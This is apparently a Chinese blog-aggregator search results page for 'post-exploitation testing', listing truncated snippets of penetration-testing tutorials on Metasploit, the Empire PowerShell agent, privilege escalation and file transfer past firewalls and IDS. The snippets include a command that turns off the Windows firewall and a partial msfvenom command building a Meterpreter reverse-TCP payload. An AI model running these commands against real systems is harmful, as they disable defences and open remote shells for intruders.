    万次阅读 2020-05-24 19:32:39
    实例演示 1.关闭windows防火墙(需要管理员或system权限) netsh advfirewall set allprofiles state off 2.... 到此就完成了mesploit-后渗透测试阶段注意事项的介绍,如果想了解更多的Kali工具,请关注我!
  • 后渗透测试神器Empire的详解

    千次阅读 2018-06-04 10:03:23
    Empire是一个PowerShell后期漏洞利用代理工具同时也是一款很强大的后渗透测神器,它建立在密码学、安全通信和灵活的架构之上。Empire实现了无需powershell.exe就可运行PowerShell代理的功能。快速部署后期漏洞利用...
  • Empire工具 Empire一款基于PowerShell的后渗透测试工具,它具有从stager生成,提权到渗透维持的一系列的功能。 Empire实现了无需powershell.exe便可运行PowerShell代理的功能,还可以快速在后期部署漏洞利用模块。 ...
  • 步骤如下Collecting InformationBlind FilesSystemNetworkingUser accountsObtain user's infor...
  • Mestasploit --- 后渗透测试阶段

    千次阅读 2018-09-05 19:05:42
    已经获得目标系统控制权扩大战果 提权 信息收集 渗透内网 永久后门 基于已有 session 扩大战果 msfvenom -a x86 –platform windows -p windows/meterpreter/reverse_tcp LHOST=...
  • 在红队渗透测试当中往往需要最大化利用当前的环境绕过重兵防守的系统的防火墙、IDS、IPS等报警和监控系统进行文件传输,本文列出了多种利用操作系统默认自带的工具进行文件传输的方法。 搭建 HTTP server Python...
  • 在对目标进行渗透测试的时候,通常情况下,我们首先获得的是一台web服务器的webshell或者反弹shell,如果权限比较低,则需要进行权限提升;后续需要对系统进行全面的分析,搞清楚系统的用途;如果目标处于一个内网...
  • 测试连接: 尝试一些操作: $ cd /root/ $ touch test.txt touch: test.txt: Permission denied 再次提权: 再次ssh以root登录: 转载于:https://www.cnblogs.com/lanqie/p/11102885.html
  • 文章的格式也许不是很好看,也没有什么合理的顺序 完全是想到什么写一些什么,但各个方面都涵盖到了 能耐下心看的朋友欢迎一起学习,大牛和杠精们请绕道 使用场景: Kali机器IP:192.168.163.132 ...
  • 前言:由于这个VPN节点服务器是之前拿到的,一直没时间做进一步渗透,昨天看到我蛋总表哥发红包,然后我运气爆表抢了个运气王,再加上好久没发文章了,所以就抽空测试下咯。 0×01 kali反弹shel进行测试 Kali生成一...
  • 后渗透测试,在这里只阐述对目标渗透后获取普通账户权限及提升至system账号权限(提权)。 目录 一、实验环境 二、利用msfvenom生成木马文件供目标下载 三、利用exploit/multi/handler模块攻击win10和win7 1、利用...

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 1,645
精华内容 658
关键字:

后渗透测试